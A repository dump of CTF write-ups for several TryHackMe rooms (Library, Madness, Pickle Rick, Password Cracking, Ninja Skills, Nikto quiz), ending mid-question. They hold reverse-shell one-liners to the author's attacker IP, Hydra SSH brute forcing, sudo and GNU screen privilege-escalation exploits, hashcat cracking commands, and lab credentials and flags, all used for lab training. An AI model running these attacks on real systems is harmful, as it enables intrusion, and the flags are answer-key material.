``` 125 | 126 | ![](https://imgur.com/SC7HTrY.png) 127 | 128 | ``` 129 | jack:ITMJpGGIqg1jn?>@ 130 | ``` 131 | 132 | ![](https://imgur.com/DkRwcid.png) 133 | 134 | ### #1 User Flag 135 | 136 | ``` 137 | jack@jack-of-all-trades:~$ python -m SimpleHTTPServer 138 | ``` 139 | 140 | ![](https://imgur.com/OEkFcsG.png) 141 | 142 | ``` 143 | securi-tay2020_{p3ugu1n-hunt3r-3xtr40rd1n41r3} 144 | ``` 145 | 146 | ### #2 Root Flag 147 | 148 | ![](https://imgur.com/wD0wagv.png) 149 | 150 | ![](https://imgur.com/otR1TZZ.png) 151 | 152 | ``` 153 | securi-tay2020_{6f125d32f38fb8ff9e720d2dbce2210a} 154 | ``` 155 | 156 | 157 | -------------------------------------------------------------------------------- /src/content/blog/library-ctf.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Library CTF - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-11 5 | description: "Writeup for the Library CTF room on TryHackMe" 6 | --- 7 | [TryHackMe | Library CTF](https://tryhackme.com/room/bsidesgtlibrary) 8 | 9 | Read user.txt and root.txt 10 | 11 | --- 12 | 13 | ### Setup 14 | 15 | ``` 16 | ➜ TryHackMe nmap -A -vv 10.10.98.89 17 | ``` 18 | 19 | ``` 20 | 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 21 | | ssh-hostkey: 22 | | 2048 c4:2f:c3:47:67:06:32:04:ef:92:91:8e:05:87:d5:dc (RSA) 23 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/X/Zd2/Rc7PrxR+K9bGX9i7Imk3JlU274UsMqM6X03THehc6XUvg0URMryl9IldYLjQvD0fadIg1jB8rCxqzRiJi35nw7ICUXnpZryDS/guLb94Sb9IrLWBTNNdUWV7bTb4gMaGHdyQAmKY62FgL2aKUFMn8SpxJu0WiVIQgcKkv15s17rNqVD39kG8x/bfdftcjn/YtEP09Sy4z1FqXF9FT1xWKaVr3Pd5rCAU4rpOzVpS+qTj77NWaXNDlcg3aCRaILD+4lquq8kVAA+VcXR9IwXOTKJRzRCMfYwd3M6QC45LlRa17xvhI++vBtCcGwxuD9JZsXu0Cd/5fdisrl 24 | | 256 68:92:13:ec:94:79:dc:bb:77:02:da:99:bf:b6:9d:b0 (ECDSA) 25 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI8Oi4FyiWylek0a1n1TD1/TBOi2uXVPfqoSo1C56D1rJlv4g2g6SDJjW29bhodoVO6W8VdWNQGiyJ5QW2XirHI= 26 | | 256 43:e8:24:fc:d8:b8:d3:aa:c2:48:08:97:51:dc:5b:7d (ED25519) 27 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOPQQrT4KT/PF+8i33LGgs0c83MQL1m863niSGsBDfCN 28 | 29 | 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) 30 | | http-methods: 31 | |_ Supported Methods: GET HEAD POST OPTIONS 32 | | http-robots.txt: 1 disallowed entry 33 | |_/ 34 | |_http-server-header: Apache/2.4.18 (Ubuntu) 35 | |_http-title: Welcome to Blog - Library Machine 36 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 37 | ``` 38 | 39 | ![](https://imgur.com/NWlX0nd.png) 40 | 41 | Let's see if there is some hidden directory 😔 42 | 43 | ``` 44 | ➜ ~ dirb http://10.10.98.89/ 45 | 46 | ----------------- 47 | DIRB v2.22 48 | By The Dark Raver 49 | ----------------- 50 | 51 | START_TIME: Tue Jun 9 16:57:31 2020 52 | URL_BASE: http://10.10.98.89/ 53 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt 54 | 55 | ----------------- 56 | 57 | GENERATED WORDS: 4612 58 | 59 | ---- Scanning URL: http://10.10.98.89/ ---- 60 | ==> DIRECTORY: http://10.10.98.89/images/ 61 | + http://10.10.98.89/index.html (CODE:200|SIZE:5439) 62 | + http://10.10.98.89/robots.txt (CODE:200|SIZE:33) 63 | + http://10.10.98.89/server-status (CODE:403|SIZE:299) 64 | ``` 65 | 66 | ![](https://imgur.com/R4JWXDR.png) 67 | 68 | ![](https://imgur.com/oY8Ps8x.png) 69 | 70 | "Posted by meliodas" maybe a username ? let's keep it.. 71 | 72 | There is nothing on the website, this is a simple landing page with HTML nothing to attack there, but there is something interresting on the "robots.txt" the "User-agent: Rockyou". 73 | 74 | Let's try to crack the ssh password with Hydra 🥰 75 | 76 | ``` 77 | # Meliodas was the name that we found on the index.html and rockyou is a list of common password 78 | ➜ TryHackMe hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.98.89 79 | ``` 80 | 81 | ![](https://imgur.com/ZMBdybW.png) 82 | 83 | ``` 84 | [22][ssh] host: 10.10.98.89 login: meliodas password: iloveyou1 85 | ``` 86 | 87 | ### #1 user.txt 88 | 89 | ![](https://imgur.com/i4x8ElV.png) 90 | 91 | ``` 92 | meliodas@ubuntu:~$ cat user.txt 93 | 6d488cbb3f111d135722c33cb635f4ec 94 | ``` 95 | 96 | ### #2 root.txt 97 | 98 | ``` 99 | meliodas@ubuntu:~$ sudo -l 100 | Matching Defaults entries for meliodas on ubuntu: 101 | env_reset, mail_badpass, 102 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 103 | 104 | User meliodas may run the following commands on ubuntu: 105 | (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py 106 | ``` 107 | 108 | ``` 109 | meliodas@ubuntu:~$ cat bak.py 110 | #!/usr/bin/env python 111 | import os 112 | import zipfile 113 | 114 | def zipdir(path, ziph): 115 | for root, dirs, files in os.walk(path): 116 | for file in files: 117 | ziph.write(os.path.join(root, file)) 118 | 119 | if __name__ == '__main__': 120 | zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED) 121 | zipdir('/var/www/html', zipf) 122 | zipf.close() 123 | ``` 124 | 125 | Ok now, we know that we can execute a python script with the root privileges let's try to have a root shell and run it with sudo 🤓 126 | 127 | ``` 128 | meliodas@ubuntu:~$ echo 'nc -e /bin/sh 10.9.2.228 4444' > bak.py 129 | -bash: bak.py: Permission denied 130 | ``` 131 | 132 | Well.. That doesn't work let's try something else.. 133 | 134 | On the sudo -l command we can see the path of the file "/home/meliodas/bak.py" 135 | 136 | Let's delete it and recreate our own one 🤑 137 | 138 | ``` 139 | meliodas@ubuntu:~$ rm -rf /home/meliodas/bak.py 140 | ``` 141 | 142 | ``` 143 | meliodas@ubuntu:~$ echo 'import pty; pty.spawn("/bin/sh")' > /home/meliodas/bak.py 144 | meliodas@ubuntu:~$ sudo python /home/meliodas/bak.py 145 | $ id 146 | uid=0(root) gid=0(root) groups=0(root) 147 | $ cd /root/ 148 | $ ls 149 | root.txt 150 | $ cat root.txt 151 | e8c8c6c256c35515d1d344ee0488c617 152 | ``` 153 | 154 | 155 | -------------------------------------------------------------------------------- /src/content/blog/madness.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Madness - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-15 5 | description: "Writeup for the Madness room on TryHackMe" 6 | --- 7 | [TryHackMe | Madness](https://tryhackme.com/room/madness) 8 | 9 | ![https://i.imgur.com/5iW7kC8.jpg](https://i.imgur.com/5iW7kC8.jpg) 10 | 11 | Please note this challenge does not require SSH brute forcing. 12 | 13 | Use your skills to access the user and root account! 14 | 15 | This room is part of the Turmoil series 16 | 17 | ### Setup 18 | 19 | ``` 20 | ➜ TryHackMe nmap -A -vv 10.10.52.214 21 | ``` 22 | 23 | ``` 24 | 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 25 | | ssh-hostkey: 26 | | 2048 ac:f9:85:10:52:65:6e:17:f5:1c:34:e7:d8:64:67:b1 (RSA) 27 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnNdHQKU4ZvpWn7Amdx7LPhuwUsHY8p1O8msRAEkaIGcDzlla2FxdlnCnS1h+A84lzn1oubZyb5vMrPM8T2IsxoSU2gcbbgfq/3giAL+hmuKm/nD43OKRflSHlcpIVgwQOVRdEfbQSOVpV5VBtJziA1Xu2dts2WWtawDS93CBtlfyeh+BuxZvBPX2k8XPWwykyR6cWbdGz1AAx6oxNRvNShJ99c9Vs7FW6bogwLAe9SWsFi2oB7ti6M/OH1qxgy7ZPQFhItvI4Vz2zZFGVEltL1fkwk2dat8yfFNWwm6+/cMTJqbVb7MPt3jc9QpmJmpgwyWuy4FTNgFt9GKNOJU6N 28 | | 256 dd:8e:5a:ec:b1:95:cd:dc:4d:01:b3:fe:5f:4e:12:c1 (ECDSA) 29 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGMMalsXVdAFj+Iu4tESrnvI/5V64b4toSG7PK2N/XPqOe3q3z5OaDTK6TWo0ezdamfDPem/UO9WesVBxmJXDkE= 30 | | 256 e9:ed:e3:eb:58:77:3b:00:5e:3a:f5:24:d8:58:34:8e (ED25519) 31 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB3zGVeEQDBVK50Tz0eNWzBJny6ddQfBb3wmmG3QtMAQ 32 | 33 | 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) 34 | | http-methods: 35 | |_ Supported Methods: HEAD POST OPTIONS 36 | |_http-server-header: Apache/2.4.18 (Ubuntu) 37 | |_http-title: Apache2 Ubuntu Default Page: It works 38 | ``` 39 | 40 | ### #1 user.txt 41 | 42 | ![](https://imgur.com/41PScB3.png) 43 | 44 | On the website in the source code we can see "They will never find me" let's wget the image and search if there is anything in there. 45 | 46 | Once you open the image an error will show up, we need to convert the header image to a jpg file 47 | 48 | ![](https://imgur.com/zdz5gC1.png) 49 | 50 | ``` 51 | change the first line to this 52 | ``` 53 | 54 | ![](https://imgur.com/PklK0ei.png) 55 | 56 | Save the hex file and open the image to seethe result ! 57 | 58 | ![](https://imgur.com/GrcsvaS.png) 59 | 60 | Nice we have a hidden directory ! 61 | 62 | ![](https://imgur.com/01jTS9C.png) 63 | 64 | ![](https://imgur.com/9D3EgD5.png) 65 | 66 | Now we have plainly of possibility to resolve this puzzle I've choose the simpler one 67 | 68 | I created a list with python 69 | 70 | ``` 71 | >>> range(100) 72 | [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99] 73 | ``` 74 | 75 | Then a imported this list in burp suite and I started the attack ! 76 | 77 | ![](https://imgur.com/ABpS7HJ.png) 78 | 79 | Now we can extract some files on the "thm.jpg" image from the apache website. 80 | 81 | ``` 82 | ➜ TryHackMe steghide extract -sf thm.jpg 83 | Enter passphrase: 84 | the file "hidden.txt" does already exist. overwrite ? (y/n) y 85 | wrote extracted data to "hidden.txt". 86 | 87 | ➜ TryHackMe cat hidden.txt 88 | Fine you found the password! 89 | 90 | Here's a username 91 | 92 | wbxre 93 | 94 | I didn't say I would make it easy for you! 95 | ``` 96 | 97 | After reading the hint given by TryHackMe 98 | 99 | ``` 100 | There's something ROTten about this guys name! 101 | ``` 102 | 103 | I tried to decode the username using the ROT13 algo 104 | 105 | ![](https://imgur.com/Qn5keAi.png) 106 | 107 | And it worked !! Let's ssh the server now with the username and password 108 | 109 | ``` 110 | ssh joker@ip 111 | password : y2RPJ4QaPF!B 112 | ``` 113 | 114 | Aaaannd it's not working for some reason.. After some time I tried the image on the room 115 | 116 | ![](https://imgur.com/P13mnW4.png) 117 | 118 | ``` 119 | ➜ TryHackMe steghide extract -sf 5iW7kC8.jpg 120 | Enter passphrase: 121 | the file "password.txt" does already exist. overwrite ? (y/n) y 122 | wrote extracted data to "password.txt". 123 | 124 | ➜ TryHackMe cat password.txt 125 | I didn't think you'd find me! Congratulations! 126 | 127 | Here take my password 128 | 129 | "*axA&GF8dP" 130 | ``` 131 | 132 | ``` 133 | ➜ TryHackMe ssh joker@10.10.52.214 134 | joker@10.10.52.214's password: "*axA&GF8dP" 135 | Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-170-generic x86_64) 136 | 137 | * Documentation: https://help.ubuntu.com 138 | * Management: https://landscape.canonical.com 139 | * Support: https://ubuntu.com/advantage 140 | 141 | Last login: Thu May 14 15:00:54 2020 from 10.9.2.228 142 | joker@ubuntu:~$ ls 143 | user.txt 144 | joker@ubuntu:~$ cat user.txt 145 | THM{d5781e53b130efe2f94f9b0354a5e4ea} 146 | ``` 147 | 148 | ### #2 root.txt 149 | 150 | Now let's get a root access ! :D 151 | 152 | ``` 153 | joker@ubuntu:~$ sudo -l 154 | [sudo] password for joker: 155 | Sorry, user joker may not run sudo on ubuntu. 156 | # Nothing to do with sudo :/ 157 | ``` 158 | 159 | ``` 160 | joker@ubuntu:~$ find /bin -perm -4000 161 | /bin/fusermount 162 | /bin/su 163 | /bin/ping6 164 | "/bin/screen-4.5.0" 165 | /bin/screen-4.5.0.old 166 | /bin/mount 167 | /bin/ping 168 | /bin/umount 169 | joker@ubuntu:~$ 170 | ``` 171 | 172 | [Offensive Security's Exploit Database Archive](https://www.exploit-db.com/exploits/41154) 173 | 174 | ``` 175 | joker@ubuntu:~$ bash s.sh 176 | ~ gnu/screenroot ~ 177 | [+] First, we create our shell and library... 178 | /tmp/libhax.c: In function ‘dropshell’: 179 | /tmp/libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration] 180 | chmod("/tmp/rootshell", 04755); 181 | ^ 182 | /tmp/rootshell.c: In function ‘main’: 183 | /tmp/rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration] 184 | setuid(0); 185 | ^ 186 | /tmp/rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration] 187 | setgid(0); 188 | ^ 189 | /tmp/rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration] 190 | seteuid(0); 191 | ^ 192 | /tmp/rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration] 193 | setegid(0); 194 | ^ 195 | /tmp/rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration] 196 | execvp("/bin/sh", NULL, NULL); 197 | ^ 198 | /usr/bin/ld: cannot open output file /tmp/rootshell: Permission denied 199 | collect2: error: ld returned 1 exit status 200 | [+] Now we create our /etc/ld.so.preload file... 201 | [+] Triggering... 202 | ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. 203 | [+] done! 204 | No Sockets found in /tmp/screens/S-joker. 205 | 206 | $ id 207 | uid=0(root) gid=0(root) groups=0(root),1000(joker) 208 | $ cd /root/ 209 | $ ls 210 | root.txt 211 | $ cat root.txt 212 | THM{5ecd98aa66a6abb670184d7547c8124a} 213 | ``` 214 | 215 | 216 | -------------------------------------------------------------------------------- /src/content/blog/ninja-skills.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Ninja Skills - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-28 5 | description: "Writeup for the Ninja Skills on TryHackMe" 6 | --- 7 | [TryHackMe | Ninja Skills](https://tryhackme.com/room/ninjaskills) 8 | 9 | ![](https://i.imgur.com/JbCoSfv.png) 10 | 11 | Let's have some fun with Linux. Deploy the machine and get started. 12 | 13 | **This machine may take up to 3 minutes to configure.** 14 | 15 | (If you prefer to SSH into the machine, use the credentials new-user as the username and password) 16 | 17 | Answer the questions about the following files: 18 | 19 | - 8V2L 20 | - bny0 21 | - c4ZX 22 | - D8B3 23 | - FHl1 24 | - oiMO 25 | - PFbD 26 | - rmfX 27 | - SRSq 28 | - uqyw 29 | - v2Vb 30 | - X1Uy 31 | 32 | The aim is to answer the questions as efficiently as possible. 33 | 34 | ### #1 Which of the above files are owned by the best-group group(enter the answer separated by spaces in alphabetical order) 35 | 36 | ``` 37 | [new-user@ip-10-10-208-44 ~]$ find / -group best-group 2>/dev/null 38 | /mnt/D8B3 39 | /home/v2Vb 40 | ``` 41 | 42 | ### #2 Which of these files contain an IP address? 43 | 44 | [RegEx: Find IP Addresses in a File Using Grep - ShellHacks](https://www.shellhacks.com/regex-find-ip-addresses-file-grep/) 45 | 46 | ``` 47 | find / -type f -name "8V2L" 2>/dev/null 48 | ``` 49 | 50 | ``` 51 | grep -E -o "(25[0–5]|2[0–4][0–9]|[01]?[0–9][0–9]?)\.(25[0–5]|2[0–4][0–9]|[01]?[0–9][0–9]?)\.(25[0–5]|2[0–4][0–9]|[01]?[0–9][0–9]?)\.(25[0–5]|2[0–4][0–9]|[01]?[0–9][0–9]?)" * 52 | ``` 53 | 54 | ``` 55 | [new-user@ip-10-10-208-44 ~]$ find / -type f -name "oiMO" 2>/dev/null 56 | /opt/oiMO 57 | [new-user@ip-10-10-208-44 ssh]$ cd /opt/ 58 | [new-user@ip-10-10-208-44 opt]$ grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" oiMO 59 | 1.1.1.1 60 | ``` 61 | 62 | ### #3 Which file has the SHA1 hash of 9d54da7584015647ba052173b84d45e8007eba94 63 | 64 | [Search file with known sha1 sum](https://askubuntu.com/questions/932694/search-file-with-known-sha1-sum) 65 | 66 | ``` 67 | for f in *; do echo '9d54da7584015647ba052173b84d45e8007eba94 '$f | sha1sum -c; done | grep OK 68 | ``` 69 | 70 | ``` 71 | [new-user@ip-10-10-208-44 ssh]$ find / -type f -name "D8B3" 2>/dev/null 72 | /mnt/D8B3 73 | [new-user@ip-10-10-208-44 ssh]$ cd /mnt/ 74 | [new-user@ip-10-10-208-44 mnt]$ for f in *; do echo '9d54da7584015647ba052173b84d45e8007eba94 '$f | sha1sum -c; done | grep OK 75 | c4ZX: OK 76 | ``` 77 | 78 | ### #4 Which file contains 230 lines? 79 | 80 | ``` 81 | wc -l * | grep 230 82 | ``` 83 | 84 | ``` 85 | bny0 86 | ``` 87 | 88 | ### #5 Which file's owner has an ID of 502? 89 | 90 | ``` 91 | [new-user@ip-10-10-208-44 /]$ find / -type f -name "X1Uy" 2>/dev/null 92 | /X1Uy 93 | [new-user@ip-10-10-208-44 /]$ cd / 94 | [new-user@ip-10-10-208-44 /]$ ls -n 95 | -rw-rw-r-- 1 "502" 501 13545 Oct 23 2019 X1Uy 96 | ``` 97 | 98 | ### #6 Which file is executable by everyone? 99 | 100 | ``` 101 | [new-user@ip-10-10-208-44 ssh]$ find / -type f -name "8V2L" 2>/dev/null 102 | /etc/8V2L 103 | [new-user@ip-10-10-208-44 ssh]$ cd /etc/ 104 | [new-user@ip-10-10-208-44 etc]$ ls -la 105 | total 1400 106 | drwxr-xr-x 78 root root 4096 May 28 16:18 . 107 | dr-xr-xr-x 25 root root 4096 May 28 16:18 .. 108 | -rwxrwxr-x 1 new-user new-user 13545 Oct 23 2019 8V2L 109 | ``` 110 | 111 | 112 | -------------------------------------------------------------------------------- /src/content/blog/o5YDmWb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/blog/o5YDmWb.png -------------------------------------------------------------------------------- /src/content/blog/password-cracking.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Password Cracking - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-04 5 | description: "Writeup for the Password Cracking room on TryHackMe" 6 | --- 7 | [TryHackMe | Password Cracking](https://tryhackme.com/room/passwordcracking) 8 | 9 | This section you will need to use Hashcat to **bruteforce** the hash by using the given **password format**. 10 | 11 | --- 12 | 13 | ### #1 Password format: "TRY-HACK-ME-" followed by 3 digits. 14 | 15 | [Hashcat Tutorial - The basics of cracking passwords with hashcat - Laconic Wolf](https://laconicwolf.com/2018/09/29/hashcat-tutorial-the-basics-of-cracking-passwords-with-hashcat/) 16 | 17 | ``` 18 | hashcat -a 3 -m 0 md5bop.txt "TRY-HACK-ME-?d?d?d" --force 19 | ``` 20 | 21 | ``` 22 | eedb694a362f8ab2effbad5e4c8fa095:TRY-HACK-ME-452 23 | ``` 24 | 25 | ### #2 Password format: "TRY-HACK-ME-" followed by 4 digits. 26 | 27 | ``` 28 | hashcat -a 3 -m 0 md5bop.txt "TRY-HACK-ME-?d?d?d?d" --force 29 | ``` 30 | 31 | ``` 32 | 19b489d1c4220946b38d65a7fce24372:TRY-HACK-ME-7163 33 | ``` 34 | 35 | ### #3 Password format: "TRY-HACK-ME-" followed by 5 digits. 36 | 37 | ``` 38 | hashcat -a 3 -m 0 md5bop.txt "TRY-HACK-ME-?d?d?d?d?d" --force 39 | ``` 40 | 41 | ``` 42 | 7353d3b528592ecd12139fba62c43287:TRY-HACK-ME-54350 43 | ``` 44 | 45 | --- 46 | 47 | This section you will need to create wordlist and combine them then use combination attacks in **hashcat**. For creating all possible n length of digits, check out **crunch**. For combining wordlists, check out **combinator** from hashcat-utils. 48 | 49 | Here the wordlist you need to for all the questions. 50 | 51 | ### #1 Password format: a united states city followed by 2 digits (all lowercase). 52 | 53 | ``` 54 | hashcat -a 6 -m 0 combi-md5.txt us-city.txt "?d?d" --force 55 | ``` 56 | 57 | ``` 58 | 0f8e6ad80411e27fc85ba1f79153dd8f:pennsylvania46 59 | ``` 60 | 61 | ### #2 Password format: a united states city followed by a simple color, followed by 3 digits (all lowercase). 62 | 63 | [How To Perform a Combinator Attack Using Hashcat](https://www.4armed.com/blog/hashcat-combinator-attack/) 64 | 65 | ``` 66 | # Since this challenge needs to have two worlist in one let's use combinator (hashcat utils) 67 | /usr/share/hashcat-utils/combinator.bin us-city.txt color.txt > combi-city-color.txt 68 | ``` 69 | 70 | ``` 71 | hashcat -a 6 -m 0 combi-md5.txt combi-city-color.txt "?d?d?d" --force 72 | ``` 73 | 74 | ``` 75 | fbd527693aceda78b30a978d7d3b9abb:phoenixpurple585 76 | ``` 77 | 78 | ### #3 Password format: a simple color followed by a country, followed by 4 digits (all lowercase).a4131ef4610be60c0c6a3656b00dd763 79 | 80 | ``` 81 | /usr/share/hashcat-utils/combinator.bin color.txt contry.txt > combi-color-country.txt 82 | ``` 83 | 84 | ``` 85 | hashcat -a 6 -m 0 combi-md5.txt combi-color-country.txt "?d?d?d?d" --force 86 | ``` 87 | 88 | ``` 89 | a4131ef4610be60c0c6a3656b00dd763:blueiceland7926 90 | ``` 91 | 92 | --- 93 | 94 | This section is you will learn how to use **rainbow tables** to crack hash. The rainbow table(**just need XP special to get all hash**) can be found **[here](http://ophcrack.sourceforge.net/tables.php)**, you will need to use **[Ophcrack](http://ophcrack.sourceforge.net/download.php)** to load the table and crack the hash. 95 | 96 | ![](https://imgur.com/zS0lftk.png) 97 | 98 | [Ophcrack](https://ophcrack.sourceforge.io/tables.php) 99 | 100 | ### #1 101 | 102 | ``` 103 | ?+$!^W@?+$!^W@NTLMForTheWin 104 | ``` 105 | 106 | ### #2 107 | 108 | ``` 109 | WinP@$$w0rd3Z 110 | ``` 111 | 112 | ### #3 113 | 114 | ``` 115 | ]?+$!^W@ 116 | ``` 117 | 118 | 119 | -------------------------------------------------------------------------------- /src/content/blog/pickle-rick-ctf.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Pickle Rick CTF - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-19 5 | description: "Writeup for the Pickle Rick CTF on TryHackMe" 6 | --- 7 | [TryHackMe | Pickle Rick CTF](https://tryhackme.com/room/picklerick) 8 | 9 | This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle. 10 | 11 | ### Setup 12 | 13 | ![](https://imgur.com/rM9j9mn.png) 14 | 15 | ``` 16 | Note to self, remember username! 17 | 18 | Username: R1ckRul3s 19 | ``` 20 | 21 | ![](https://imgur.com/lUU7tXN.png) 22 | 23 | ``` 24 | Maybe a password ? 25 | Wubbalubbadubdub 26 | ``` 27 | 28 | ![](https://imgur.com/xtHHGaE.png) 29 | 30 | ``` 31 | Account: 32 | R1ckRul3s:Wubbalubbadubdub 33 | ``` 34 | 35 | ### #1 Deploy the virtual machine on this task and explore the web application. What is the first ingredient Rick needs? 36 | 37 | ![](https://imgur.com/1vWZUA9.png) 38 | 39 | ``` 40 | cat Sup3rS3cretPickl3Ingred.txt 41 | ``` 42 | 43 | ![](https://imgur.com/J5cZERN.png) 44 | 45 | Let's try something else then ... 46 | 47 | [bash | GTFOBins](https://gtfobins.github.io/gtfobins/bash/) 48 | 49 | ``` 50 | bash -c 'exec bash -i &>/dev/tcp/10.9.2.228/4444 <&1' 51 | ``` 52 | 53 | ``` 54 | www-data@ip-10-10-91-207:/var/www/html$ ls 55 | ls 56 | Sup3rS3cretPickl3Ingred.txt 57 | assets 58 | clue.txt 59 | denied.php 60 | index.html 61 | login.php 62 | portal.php 63 | robots.txt 64 | www-data@ip-10-10-91-207:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt 65 | cat Sup3rS3cretPickl3Ingred.txt 66 | mr. meeseek hair 67 | ``` 68 | 69 | ### #2 Whats the second ingredient Rick needs? 70 | 71 | When you are in root you can't cd in the directory so I used the less command like so. 72 | 73 | ``` 74 | less /home/rick/"second ingredients" 75 | 1 jerry tear 76 | ``` 77 | 78 | ### #3 Whats the final ingredient Rick needs? 79 | 80 | ``` 81 | www-data@ip-10-10-91-207:/var/www/html$ sudo -l 82 | Matching Defaults entries for www-data on 83 | ip-10-10-91-207.eu-west-1.compute.internal: 84 | env_reset, mail_badpass, 85 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 86 | 87 | User www-data may run the following commands on 88 | ip-10-10-91-207.eu-west-1.compute.internal: 89 | (ALL) NOPASSWD: ALL 90 | www-data@ip-10-10-91-207:/var/www/html$ sudo su 91 | cd /root/ 92 | ls 93 | 3rd.txt 94 | snap 95 | cat 3rd.txt 96 | 3rd ingredients: fleeb juice 97 | ``` 98 | 99 | 100 | -------------------------------------------------------------------------------- /src/content/blog/rp-web-scanning.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "RP Web Scanning - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-19 5 | description: "Writeup for the RP Web Scanning challenge" 6 | --- 7 | [TryHackMe | RP: Web Scanning](https://tryhackme.com/room/rpwebscanning) 8 | 9 | A short quiz over the various switches used with Nikto as well as a quick scan against our target. All you'll need for this is the help menu for nikto. Include all parts of the switch unless otherwise specified. 10 | 11 | --- 12 | 13 | ### #1 First and foremost, what switch do we use to set the target host? 14 | 15 | ``` 16 | -h 17 | ``` 18 | 19 | ![](https://imgur.com/PSZSL2E.png) 20 | 21 | ### #2 Websites don't always properly redirect to their secure transport port and can sometimes have different issues depending on the manner in which they are scanned. How do we disable secure transport? 22 | 23 | ``` 24 | -nossl 25 | ``` 26 | 27 | ![](https://imgur.com/uv9VtgE.png) 28 | 29 | ### #3 How about the opposite, how do we force secure transport? 30 | 31 | ``` 32 | -ssl 33 | ``` 34 | 35 | ![](https://imgur.com/onlbrJL.png) 36 | 37 | ### #4 What if we want to set a specific port to scan? 38 | 39 | ``` 40 | -p 41 | ``` 42 | 43 | ![](https://imgur.com/BWc33ta.png) 44 | 45 | ### #5 As the web is constantly evolving, so is Nikto. A database of 46 | 47 | vulnerabilities represents a core component to this web scanner, how do 48 | we verify that this database is working and free from error? 49 | 50 | ``` 51 | -dbcheck 52 | ``` 53 | 54 | ![](https://imgur.com/MCdgB7b.png) 55 | 56 | ### #6 If instructed to, Nitko will attempt to guess and test both files within 57 | 58 | directories as well as usernames. Which switch and numerical value do we use to set Nikto to enumerate usernames in Apache? Keep in mind, this option is deprecated in favor of plugins, however, it's still a great 59 | option to be aware of for situational usage. 60 | 61 | ``` 62 | -mutate 3 63 | ``` 64 | 65 | ![](https://imgur.com/d3bHgpa.png) 66 | 67 | ### #7 Suppose we know the username and password for a web forum, how do we set Nikto to do a credentialed check? Suppose the username is admin and the password is PrettyAwesomePassword1234 68 | 69 | ``` 70 | -i admin:PrettyAwesomePassword1234 71 | ``` 72 | 73 | ![](https://imgur.com/nzo8Qsi.png) 74 | 75 | ### #8 Let's scan our target machine, what web server do we discover and what version is it? 76 | 77 | ``` 78 | Apache/2.4.7 79 | ``` 80 | 81 | ![](https://imgur.com/T6kn7p7.png) 82 | 83 | ### #9 This box is vulnerable to very poor directory control due to it's web server version, what directory is indexed that really shouldn't be? 84 | 85 | ``` 86 | config 87 | ``` 88 | 89 | ![](https://imgur.com/0ThZXh1.png) 90 | 91 | ### #10 Nikto scans can take a while to fully complete, which switch do we set in order to limit the scan to end at a certain time? 92 | 93 | ``` 94 | -until 95 | ``` 96 | 97 | ![](https://imgur.com/Jecp0D4.png) 98 | 99 | ### #11 But wait, 